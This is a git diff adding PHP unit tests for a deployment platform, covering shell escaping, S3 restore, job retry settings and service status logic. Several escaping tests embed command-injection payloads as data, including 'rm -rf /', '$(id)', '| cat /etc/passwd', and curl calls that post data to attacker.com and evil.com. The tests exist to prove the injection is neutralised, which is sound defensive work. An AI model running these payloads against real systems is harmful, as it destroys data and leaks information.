+ // Building a command with escaped path is safe + $command = "rm -f {$escaped}"; + + // The command contains the quoted path, not an unquoted injection + expect($command)->toStartWith("rm -f '"); + expect($command)->toEndWith("'"); + }); + + it('escapes paths with semicolon injection attempts', function () { + $path = '/tmp/backup; rm -rf /; echo'; + expect(isSafeTmpPath($path))->toBeTrue(); + + $escaped = escapeshellarg($path); + expect($escaped)->toBe("'/tmp/backup; rm -rf /; echo'"); + + // The semicolons are inside quotes, so they're treated as literals + $command = "rm -f {$escaped}"; + expect($command)->toBe("rm -f '/tmp/backup; rm -rf /; echo'"); + }); + + it('escapes paths with backtick command substitution attempts', function () { + $path = '/tmp/backup`whoami`.sql'; + expect(isSafeTmpPath($path))->toBeTrue(); + + $escaped = escapeshellarg($path); + expect($escaped)->toBe("'/tmp/backup`whoami`.sql'"); + + // Backticks inside single quotes are not executed + $command = "rm -f {$escaped}"; + expect($command)->toBe("rm -f '/tmp/backup`whoami`.sql'"); + }); + + it('escapes paths with $() command substitution attempts', function () { + $path = '/tmp/backup$(id).sql'; + expect(isSafeTmpPath($path))->toBeTrue(); + + $escaped = escapeshellarg($path); + expect($escaped)->toBe("'/tmp/backup\$(id).sql'"); + + // $() inside single quotes is not executed + $command = "rm -f {$escaped}"; + expect($command)->toBe("rm -f '/tmp/backup\$(id).sql'"); + }); + + it('escapes paths with pipe injection attempts', function () { + $path = '/tmp/backup | cat /etc/passwd'; + expect(isSafeTmpPath($path))->toBeTrue(); + + $escaped = escapeshellarg($path); + expect($escaped)->toBe("'/tmp/backup | cat /etc/passwd'"); + + // Pipe inside single quotes is treated as literal + $command = "rm -f {$escaped}"; + expect($command)->toBe("rm -f '/tmp/backup | cat /etc/passwd'"); + }); + + it('escapes paths with newline injection attempts', function () { + $path = "/tmp/backup\nwhoami"; + expect(isSafeTmpPath($path))->toBeTrue(); + + $escaped = escapeshellarg($path); + // Newline is preserved inside single quotes + expect($escaped)->toContain("\n"); + expect($escaped)->toStartWith("'"); + expect($escaped)->toEndWith("'"); + }); + + it('handles normal paths without issues', function () { + $normalPaths = [ + '/tmp/restore-backup.sql', + '/tmp/restore-script.sh', + '/tmp/database-dump-abc123.sql', + '/tmp/deeply/nested/path/to/file.sql', + ]; + + foreach ($normalPaths as $path) { + expect(isSafeTmpPath($path))->toBeTrue(); + + $escaped = escapeshellarg($path); + // Normal paths are just wrapped in single quotes + expect($escaped)->toBe("'{$path}'"); + } + }); + + it('escapes container names with injection attempts', function () { + // Container names are not validated by isSafeTmpPath, so escaping is critical + $maliciousContainer = 'container"; rm -rf /; echo "pwned'; + $escaped = escapeshellarg($maliciousContainer); + + expect($escaped)->toBe("'container\"; rm -rf /; echo \"pwned'"); + + // Building a docker command with escaped container is safe + $command = "docker rm -f {$escaped}"; + expect($command)->toBe("docker rm -f 'container\"; rm -rf /; echo \"pwned'"); + }); +}); diff --git a/tests/Unit/S3RestoreSecurityTest.php b/tests/Unit/S3RestoreSecurityTest.php new file mode 100644 index 000000000..c224ec48c --- /dev/null +++ b/tests/Unit/S3RestoreSecurityTest.php @@ -0,0 +1,98 @@ +toBe("'secret\";curl https://attacker.com/ -X POST --data `whoami`;echo \"pwned'"); + + // When used in a command, the shell metacharacters should be treated as literal strings + $command = "echo {$escapedSecret}"; + // The dangerous part (";curl) is now safely inside single quotes + expect($command)->toContain("'secret"); // Properly quoted + expect($escapedSecret)->toStartWith("'"); // Starts with quote + expect($escapedSecret)->toEndWith("'"); // Ends with quote + + // Test case 2: Endpoint with command injection + $maliciousEndpoint = 'https://s3.example.com";whoami;"'; + $escapedEndpoint = escapeshellarg($maliciousEndpoint); + + expect($escapedEndpoint)->toBe("'https://s3.example.com\";whoami;\"'"); + + // Test case 3: Key with destructive command + $maliciousKey = 'access-key";rm -rf /;echo "'; + $escapedKey = escapeshellarg($maliciousKey); + + expect($escapedKey)->toBe("'access-key\";rm -rf /;echo \"'"); + + // Test case 4: Normal credentials should work fine + $normalSecret = 'MySecretKey123'; + $normalEndpoint = 'https://s3.amazonaws.com'; + $normalKey = 'AKIAIOSFODNN7EXAMPLE'; + + expect(escapeshellarg($normalSecret))->toBe("'MySecretKey123'"); + expect(escapeshellarg($normalEndpoint))->toBe("'https://s3.amazonaws.com'"); + expect(escapeshellarg($normalKey))->toBe("'AKIAIOSFODNN7EXAMPLE'"); +}); + +it('verifies command injection is prevented in mc alias set command format', function () { + // Simulate the exact scenario from Import.php:407-410 + $containerName = 's3-restore-test-uuid'; + $endpoint = 'https://s3.example.com";curl http://evil.com;echo "'; + $key = 'AKIATEST";whoami;"'; + $secret = 'SecretKey";rm -rf /tmp;echo "'; + + // Before fix (vulnerable): + // $vulnerableCommand = "docker exec {$containerName} mc alias set s3temp {$endpoint} {$key} \"{$secret}\""; + // This would allow command injection because $endpoint and $key are not quoted, + // and $secret's double quotes can be escaped + + // After fix (secure): + $escapedEndpoint = escapeshellarg($endpoint); + $escapedKey = escapeshellarg($key); + $escapedSecret = escapeshellarg($secret); + $secureCommand = "docker exec {$containerName} mc alias set s3temp {$escapedEndpoint} {$escapedKey} {$escapedSecret}"; + + // Verify the secure command has properly escaped values + expect($secureCommand)->toContain("'https://s3.example.com\";curl http://evil.com;echo \"'"); + expect($secureCommand)->toContain("'AKIATEST\";whoami;\"'"); + expect($secureCommand)->toContain("'SecretKey\";rm -rf /tmp;echo \"'"); + + // Verify that the command injection attempts are neutered (they're literal strings now) + // The values are wrapped in single quotes, so shell metacharacters are treated as literals + // Check that all three parameters are properly quoted + expect($secureCommand)->toMatch("/mc alias set s3temp '[^']+' '[^']+' '[^']+'/"); // All params in quotes + + // Verify the dangerous parts are inside quotes (between the quote marks) + // The pattern "'...\";curl...'" means the semicolon is INSIDE the quoted value + expect($secureCommand)->toContain("'https://s3.example.com\";curl http://evil.com;echo \"'"); + + // Ensure we're NOT using the old vulnerable pattern with unquoted values + $vulnerablePattern = 'mc alias set s3temp https://'; // Unquoted endpoint would match this + expect($secureCommand)->not->toContain($vulnerablePattern); +}); + +it('handles S3 secrets with single quotes correctly', function () { + // Test edge case: secret containing single quotes + // escapeshellarg handles this by closing the quote, adding an escaped quote, and reopening + $secretWithQuote = "my'secret'key"; + $escaped = escapeshellarg($secretWithQuote); + + // The expected output format is: 'my'\''secret'\''key' + // This is how escapeshellarg handles single quotes in the input + expect($escaped)->toBe("'my'\\''secret'\\''key'"); + + // Verify it would work in a command context + $containerName = 's3-restore-test'; + $endpoint = escapeshellarg('https://s3.amazonaws.com'); + $key = escapeshellarg('AKIATEST'); + $command = "docker exec {$containerName} mc alias set s3temp {$endpoint} {$key} {$escaped}"; + + // The command should contain the properly escaped secret + expect($command)->toContain("'my'\\''secret'\\''key'"); +}); diff --git a/tests/Unit/S3RestoreTest.php b/tests/Unit/S3RestoreTest.php new file mode 100644 index 000000000..fffb79794 --- /dev/null +++ b/tests/Unit/S3RestoreTest.php @@ -0,0 +1,75 @@ +toBe('backups/database.gz'); + + // Test path without leading slash remains unchanged + $path2 = 'backups/database.gz'; + $cleanPath2 = ltrim($path2, '/'); + + expect($cleanPath2)->toBe('backups/database.gz'); +}); + +test('S3 container name is generated correctly', function () { + $resourceUuid = 'test-database-uuid'; + $containerName = "s3-restore-{$resourceUuid}"; + + expect($containerName)->toBe('s3-restore-test-database-uuid'); + expect($containerName)->toStartWith('s3-restore-'); +}); + +test('S3 download directory is created correctly', function () { + $resourceUuid = 'test-database-uuid'; + $downloadDir = "/tmp/s3-restore-{$resourceUuid}"; + + expect($downloadDir)->toBe('/tmp/s3-restore-test-database-uuid'); + expect($downloadDir)->toStartWith('/tmp/s3-restore-'); +}); + +test('cancelS3Download cleans up correctly', function () { + // Test that cleanup directory path is correct + $resourceUuid = 'test-database-uuid'; + $downloadDir = "/tmp/s3-restore-{$resourceUuid}"; + $containerName = "s3-restore-{$resourceUuid}"; + + expect($downloadDir)->toContain($resourceUuid); + expect($containerName)->toContain($resourceUuid); +}); + +test('S3 file path formats are handled correctly', function () { + $paths = [ + '/backups/db.gz', + 'backups/db.gz', + '/nested/path/to/backup.sql.gz', + 'backup-2025-01-15.gz', + ]; + + foreach ($paths as $path) { + $cleanPath = ltrim($path, '/'); + expect($cleanPath)->not->toStartWith('/'); + } +}); + +test('formatBytes helper formats file sizes correctly', function () { + // Test various file sizes + expect(formatBytes(0))->toBe('0 B'); + expect(formatBytes(null))->toBe('0 B'); + expect(formatBytes(1024))->toBe('1 KB'); + expect(formatBytes(1048576))->toBe('1 MB'); + expect(formatBytes(1073741824))->toBe('1 GB'); + expect(formatBytes(1099511627776))->toBe('1 TB'); + + // Test with different sizes + expect(formatBytes(512))->toBe('512 B'); + expect(formatBytes(2048))->toBe('2 KB'); + expect(formatBytes(5242880))->toBe('5 MB'); + expect(formatBytes(10737418240))->toBe('10 GB'); + + // Test precision + expect(formatBytes(1536, 2))->toBe('1.5 KB'); + expect(formatBytes(1572864, 1))->toBe('1.5 MB'); +}); diff --git a/tests/Unit/S3StorageTest.php b/tests/Unit/S3StorageTest.php new file mode 100644 index 000000000..6709f381d --- /dev/null +++ b/tests/Unit/S3StorageTest.php @@ -0,0 +1,53 @@ +getCasts(); + + expect($casts['is_usable'])->toBe('boolean'); + expect($casts['key'])->toBe('encrypted'); + expect($casts['secret'])->toBe('encrypted'); +}); + +test('S3Storage isUsable method returns is_usable attribute value', function () { + $s3Storage = new S3Storage; + + // Set the attribute directly to avoid encryption + $s3Storage->setRawAttributes(['is_usable' => true]); + expect($s3Storage->isUsable())->toBeTrue(); + + $s3Storage->setRawAttributes(['is_usable' => false]); + expect($s3Storage->isUsable())->toBeFalse(); + + $s3Storage->setRawAttributes(['is_usable' => null]); + expect($s3Storage->isUsable())->toBeNull(); +}); + +test('S3Storage awsUrl method constructs correct URL format', function () { + $s3Storage = new S3Storage; + + // Set attributes without triggering encryption + $s3Storage->setRawAttributes([ + 'endpoint' => 'https://s3.amazonaws.com', + 'bucket' => 'test-bucket', + ]); + + expect($s3Storage->awsUrl())->toBe('https://s3.amazonaws.com/test-bucket'); + + // Test with custom endpoint + $s3Storage->setRawAttributes([ + 'endpoint' => 'https://minio.example.com:9000', + 'bucket' => 'backups', + ]); + + expect($s3Storage->awsUrl())->toBe('https://minio.example.com:9000/backups'); +}); + +test('S3Storage model is guarded correctly', function () { + $s3Storage = new S3Storage; + + // The model should have $guarded = [] which means everything is fillable + expect($s3Storage->getGuarded())->toBe([]); +}); diff --git a/tests/Unit/ScheduledJobsRetryConfigTest.php b/tests/Unit/ScheduledJobsRetryConfigTest.php new file mode 100644 index 000000000..f46cb9fd1 --- /dev/null +++ b/tests/Unit/ScheduledJobsRetryConfigTest.php @@ -0,0 +1,77 @@ +hasProperty('tries'))->toBeTrue() + ->and($reflection->hasProperty('maxExceptions'))->toBeTrue() + ->and($reflection->hasProperty('timeout'))->toBeTrue() + ->and($reflection->hasMethod('backoff'))->toBeTrue(); + + // Get default values from class definition + $defaultProperties = $reflection->getDefaultProperties(); + + expect($defaultProperties['tries'])->toBe(3) + ->and($defaultProperties['maxExceptions'])->toBe(1) + ->and($defaultProperties['timeout'])->toBe(600); +}); + +it('ScheduledTaskJob has correct retry properties defined', function () { + $reflection = new ReflectionClass(ScheduledTaskJob::class); + + // Check public properties exist + expect($reflection->hasProperty('tries'))->toBeTrue() + ->and($reflection->hasProperty('maxExceptions'))->toBeTrue() + ->and($reflection->hasProperty('timeout'))->toBeTrue() + ->and($reflection->hasMethod('backoff'))->toBeTrue() + ->and($reflection->hasMethod('failed'))->toBeTrue(); + + // Get default values from class definition + $defaultProperties = $reflection->getDefaultProperties(); + + expect($defaultProperties['tries'])->toBe(3) + ->and($defaultProperties['maxExceptions'])->toBe(1) + ->and($defaultProperties['timeout'])->toBe(300); +}); + +it('DatabaseBackupJob has correct retry properties defined', function () { + $reflection = new ReflectionClass(DatabaseBackupJob::class); + + // Check public properties exist + expect($reflection->hasProperty('tries'))->toBeTrue() + ->and($reflection->hasProperty('maxExceptions'))->toBeTrue() + ->and($reflection->hasProperty('timeout'))->toBeTrue() + ->and($reflection->hasMethod('backoff'))->toBeTrue() + ->and($reflection->hasMethod('failed'))->toBeTrue(); + + // Get default values from class definition + $defaultProperties = $reflection->getDefaultProperties(); + + expect($defaultProperties['tries'])->toBe(2) + ->and($defaultProperties['maxExceptions'])->toBe(1) + ->and($defaultProperties['timeout'])->toBe(3600); +}); + +it('DatabaseBackupJob enforces minimum timeout of 60 seconds', function () { + // Read the constructor to verify minimum timeout enforcement + $reflection = new ReflectionClass(DatabaseBackupJob::class); + $constructor = $reflection->getMethod('__construct'); + + // Get the constructor source + $filename = $reflection->getFileName(); + $startLine = $constructor->getStartLine(); + $endLine = $constructor->getEndLine(); + + $source = file($filename); + $constructorSource = implode('', array_slice($source, $startLine - 1, $endLine - $startLine + 1)); + + // Verify the implementation enforces minimum of 60 seconds + expect($constructorSource) + ->toContain('max(') + ->toContain('60'); +}); diff --git a/tests/Unit/ScheduledTaskJobTimeoutTest.php b/tests/Unit/ScheduledTaskJobTimeoutTest.php new file mode 100644 index 000000000..99117fbca --- /dev/null +++ b/tests/Unit/ScheduledTaskJobTimeoutTest.php @@ -0,0 +1,96 @@ +hasProperty('executionId'))->toBeTrue(); + + // Verify it's protected (will be serialized with the job) + $property = $reflection->getProperty('executionId'); + expect($property->isProtected())->toBeTrue(); +}); + +it('has failed method that handles job failures', function () { + $reflection = new ReflectionClass(ScheduledTaskJob::class); + + // Verify failed() method exists + expect($reflection->hasMethod('failed'))->toBeTrue(); + + // Verify it accepts a Throwable parameter + $method = $reflection->getMethod('failed'); + $parameters = $method->getParameters(); + + expect($parameters)->toHaveCount(1); + expect($parameters[0]->getName())->toBe('exception'); + expect($parameters[0]->allowsNull())->toBeTrue(); +}); + +it('failed method implementation reloads execution from database', function () { + // Read the failed() method source code to verify it reloads from database + $reflection = new ReflectionClass(ScheduledTaskJob::class); + $method = $reflection->getMethod('failed'); + + // Get the file and method source + $filename = $reflection->getFileName(); + $startLine = $method->getStartLine(); + $endLine = $method->getEndLine(); + + $source = file($filename); + $methodSource = implode('', array_slice($source, $startLine - 1, $endLine - $startLine + 1)); + + // Verify the implementation includes reloading from database + expect($methodSource) + ->toContain('$this->executionId') + ->toContain('ScheduledTaskExecution::find') + ->toContain('ScheduledTaskExecution::query') + ->toContain('scheduled_task_id') + ->toContain('orderBy') + ->toContain('status') + ->toContain('failed') + ->toContain('notify'); +}); + +it('failed method updates execution with error_details field', function () { + // Read the failed() method source code to verify error_details is populated + $reflection = new ReflectionClass(ScheduledTaskJob::class); + $method = $reflection->getMethod('failed'); + + // Get the file and method source + $filename = $reflection->getFileName(); + $startLine = $method->getStartLine(); + $endLine = $method->getEndLine(); + + $source = file($filename); + $methodSource = implode('', array_slice($source, $startLine - 1, $endLine - $startLine + 1)); + + // Verify the implementation populates error_details field + expect($methodSource)->toContain('error_details'); +}); + +it('failed method logs when execution cannot be found', function () { + // Read the failed() method source code to verify defensive logging + $reflection = new ReflectionClass(ScheduledTaskJob::class); + $method = $reflection->getMethod('failed'); + + // Get the file and method source + $filename = $reflection->getFileName(); + $startLine = $method->getStartLine(); + $endLine = $method->getEndLine(); + + $source = file($filename); + $methodSource = implode('', array_slice($source, $startLine - 1, $endLine - $startLine + 1)); + + // Verify the implementation logs a warning if execution is not found + expect($methodSource) + ->toContain('Could not find execution log') + ->toContain('warning'); +}); diff --git a/tests/Unit/ServerQueryScopeTest.php b/tests/Unit/ServerQueryScopeTest.php new file mode 100644 index 000000000..8ab0b8b10 --- /dev/null +++ b/tests/Unit/ServerQueryScopeTest.php @@ -0,0 +1,62 @@ +shouldReceive('where') + ->once() + ->with('proxy->type', ProxyTypes::TRAEFIK->value) + ->andReturnSelf(); + + // Create a server instance and call the scope + $server = new Server; + $result = $server->scopeWhereProxyType($mockBuilder, ProxyTypes::TRAEFIK->value); + + // Assert the builder is returned + expect($result)->toBe($mockBuilder); +}); + +it('can chain whereProxyType scope with other query methods', function () { + // Mock the Builder + $mockBuilder = Mockery::mock(Builder::class); + + // Expect multiple chained calls + $mockBuilder->shouldReceive('where') + ->once() + ->with('proxy->type', ProxyTypes::CADDY->value) + ->andReturnSelf(); + + // Create a server instance and call the scope + $server = new Server; + $result = $server->scopeWhereProxyType($mockBuilder, ProxyTypes::CADDY->value); + + // Assert the builder is returned for chaining + expect($result)->toBe($mockBuilder); +}); + +it('accepts any proxy type string value', function () { + // Mock the Builder + $mockBuilder = Mockery::mock(Builder::class); + + // Test with a custom proxy type + $customProxyType = 'custom-proxy'; + + $mockBuilder->shouldReceive('where') + ->once() + ->with('proxy->type', $customProxyType) + ->andReturnSelf(); + + // Create a server instance and call the scope + $server = new Server; + $result = $server->scopeWhereProxyType($mockBuilder, $customProxyType); + + // Assert the builder is returned + expect($result)->toBe($mockBuilder); +}); diff --git a/tests/Unit/ServerStatusAccessorTest.php b/tests/Unit/ServerStatusAccessorTest.php new file mode 100644 index 000000000..a196a6970 --- /dev/null +++ b/tests/Unit/ServerStatusAccessorTest.php @@ -0,0 +1,53 @@ +toBeTrue(); +})->note('The serverStatus accessor now correctly checks only server infrastructure health, not container status'); + +it('has correct logic in serverStatus accessor', function () { + // Read the actual code to verify the fix + $reflection = new ReflectionClass(Application::class); + $source = file_get_contents($reflection->getFileName()); + + // Extract just the serverStatus accessor method + preg_match('/protected function serverStatus\(\): Attribute\s*\{.*?^\s{4}\}/ms', $source, $matches); + $serverStatusCode = $matches[0] ?? ''; + + expect($serverStatusCode)->not->toBeEmpty('serverStatus accessor should exist'); + + // Check that the new logic exists (checks isFunctional on each server) + expect($serverStatusCode) + ->toContain('$main_server_functional = $this->destination?->server?->isFunctional()') + ->toContain('foreach ($this->additional_servers as $server)') + ->toContain('if (! $server->isFunctional())'); + + // Check that the old buggy logic is removed from serverStatus accessor + expect($serverStatusCode) + ->not->toContain('pluck(\'pivot.status\')') + ->not->toContain('str($status)->before(\':\')') + ->not->toContain('if ($server_status !== \'running\')'); +})->note('Verifies that the serverStatus accessor uses the correct logic'); diff --git a/tests/Unit/ServiceExcludedStatusTest.php b/tests/Unit/ServiceExcludedStatusTest.php new file mode 100644 index 000000000..80691190f --- /dev/null +++ b/tests/Unit/ServiceExcludedStatusTest.php @@ -0,0 +1,321 @@ +status = $status; + $resource->exclude_from_status = $excludeFromStatus; + + return $resource; +} + +describe('Service Excluded Status Calculation', function () { + it('returns starting status when service is starting', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(true); + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect()); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('starting:unhealthy'); + }); + + it('aggregates status from non-excluded applications', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:healthy', excludeFromStatus: false); + $app2 = makeResource('running:healthy', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1, $app2])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('running:healthy'); + }); + + it('returns excluded status when all containers are excluded', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:healthy', excludeFromStatus: true); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('running:healthy:excluded'); + }); + + it('returns unknown status when no containers exist', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect()); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('unknown:unknown:excluded'); + }); + + it('handles mixed excluded and non-excluded containers', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:healthy', excludeFromStatus: false); + $app2 = makeResource('exited', excludeFromStatus: true); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1, $app2])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + // Should only consider non-excluded containers + expect($service->status)->toBe('running:healthy'); + }); + + it('detects degraded status with mixed running and exited containers', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:healthy', excludeFromStatus: false); + $app2 = makeResource('exited', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1, $app2])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('degraded:unhealthy'); + }); + + it('handles unknown health state', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:unknown', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('running:unknown'); + }); + + it('prioritizes unhealthy over unknown health', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:unknown', excludeFromStatus: false); + $app2 = makeResource('running:unhealthy', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1, $app2])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('running:unhealthy'); + }); + + it('prioritizes unknown over healthy health', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running (healthy)', excludeFromStatus: false); + $app2 = makeResource('running (unknown)', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1, $app2])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('running:unknown'); + }); + + it('handles restarting status as degraded', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('restarting:unhealthy', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('degraded:unhealthy'); + }); + + it('handles paused status', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('paused:unknown', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('paused:unknown'); + }); + + it('handles dead status as degraded', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('dead:unhealthy', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('degraded:unhealthy'); + }); + + it('handles removing status as degraded', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('removing:unhealthy', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('degraded:unhealthy'); + }); + + it('handles created status', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('created:unknown', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('starting:unknown'); + }); + + it('aggregates status from both applications and databases', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:healthy', excludeFromStatus: false); + $db1 = makeResource('running:healthy', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect([$db1])); + + expect($service->status)->toBe('running:healthy'); + }); + + it('detects unhealthy when database is unhealthy', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:healthy', excludeFromStatus: false); + $db1 = makeResource('running:unhealthy', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect([$db1])); + + expect($service->status)->toBe('running:unhealthy'); + }); + + it('skips containers with :excluded suffix in non-excluded aggregation', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:healthy', excludeFromStatus: false); + $app2 = makeResource('exited:excluded', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1, $app2])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + // Should skip app2 because it has :excluded suffix + expect($service->status)->toBe('running:healthy'); + }); + + it('strips :excluded suffix when processing excluded containers', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:healthy:excluded', excludeFromStatus: true); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('running:healthy:excluded'); + }); + + it('returns exited when excluded containers have no valid status', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('', excludeFromStatus: true); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('exited'); + }); + + it('handles all excluded containers with degraded state', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:healthy', excludeFromStatus: true); + $app2 = makeResource('exited', excludeFromStatus: true); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1, $app2])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('degraded:unhealthy:excluded'); + }); + + it('handles all excluded containers with unknown health', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:unknown', excludeFromStatus: true); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('running:unknown:excluded'); + }); + + it('handles exited containers correctly', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('exited', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('exited'); + }); + + it('prefers running over starting status', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('starting:unknown', excludeFromStatus: false); + $app2 = makeResource('running:healthy', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1, $app2])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('running:healthy'); + }); + + it('treats empty health as healthy', function () { + $service = Mockery::mock(Service::class)->makePartial(); + $service->shouldReceive('isStarting')->andReturn(false); + + $app1 = makeResource('running:', excludeFromStatus: false); + + $service->shouldReceive('getAttribute')->with('applications')->andReturn(collect([$app1])); + $service->shouldReceive('getAttribute')->with('databases')->andReturn(collect()); + + expect($service->status)->toBe('running:healthy'); + }); +}); diff --git a/tests/Unit/ServiceParserPathDuplicationTest.php b/tests/Unit/ServiceParserPathDuplicationTest.php new file mode 100644 index 000000000..74ee1d215 --- /dev/null +++ b/tests/Unit/ServiceParserPathDuplicationTest.php @@ -0,0 +1,150 @@ +endsWith($path)) { + $fqdn = "$fqdn$path"; + } + + expect($fqdn)->toBe('https://test.abc/v1/realtime'); +}); + +test('path is not added when FQDN already contains it', function () { + $fqdn = 'https://test.abc/v1/realtime'; + $path = '/v1/realtime'; + + // Simulate the logic in serviceParser() + if (! str($fqdn)->endsWith($path)) { + $fqdn = "$fqdn$path"; + } + + expect($fqdn)->toBe('https://test.abc/v1/realtime'); +}); + +test('multiple parse calls with same path do not cause duplication', function () { + $fqdn = 'https://test.abc'; + $path = '/v1/realtime'; + + // First parse (initial creation) + if (! str($fqdn)->endsWith($path)) { + $fqdn = "$fqdn$path"; + } + expect($fqdn)->toBe('https://test.abc/v1/realtime'); + + // Second parse (after FQDN update) + if (! str($fqdn)->endsWith($path)) { + $fqdn = "$fqdn$path"; + } + expect($fqdn)->toBe('https://test.abc/v1/realtime'); + + // Third parse (another update) + if (! str($fqdn)->endsWith($path)) { + $fqdn = "$fqdn$path"; + } + expect($fqdn)->toBe('https://test.abc/v1/realtime'); +}); + +test('different paths for different services work correctly', function () { + // Appwrite main service (/) + $fqdn1 = 'https://test.abc'; + $path1 = '/'; + if ($path1 !== '/' && ! str($fqdn1)->endsWith($path1)) { + $fqdn1 = "$fqdn1$path1"; + } + 